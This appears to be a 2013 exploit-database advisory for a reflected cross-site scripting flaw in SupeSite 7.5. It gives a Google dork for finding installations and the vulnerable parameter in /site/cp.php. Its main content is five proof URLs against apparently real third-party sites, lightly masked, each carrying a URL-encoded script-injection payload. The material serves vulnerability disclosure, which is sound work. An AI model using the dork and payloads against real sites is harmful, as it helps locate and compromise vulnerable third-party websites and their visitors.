#****************************************************************************
# Exploit Title : SupeSite 7.5 Cross site scripting vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Date: 2013/08/21
# Vendor Page: http://www.supesite.com/
# Version: 7.5
# AVN : ASH-2013-144
#****************************************************************************
# Tested on: Windows,Linux
#****************************************************************************
#
#///////////////////////////////////////////////
# Google Dork : intext:"Powered by SupeSite 7.5"
#///////////////////////////////////////////////
# Location : /site/cp.php?&ac=news&do=[xss]
#
# Proof:
#
# http://wwwX.com/site/cp.php?&ac=news&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://lib.ouX.cn/site/cp.php?&ac=news&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.opXwrt.org.cn/site/cp.php?ac=news&op=list&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://17pXku.com/site/cp.php?ac=news&op=list&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
# http://www.chaXsha0731.cn/site/cp.php?&ac=news&do=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
##############################################################################
discovered by : ACC3SS
##############################################################################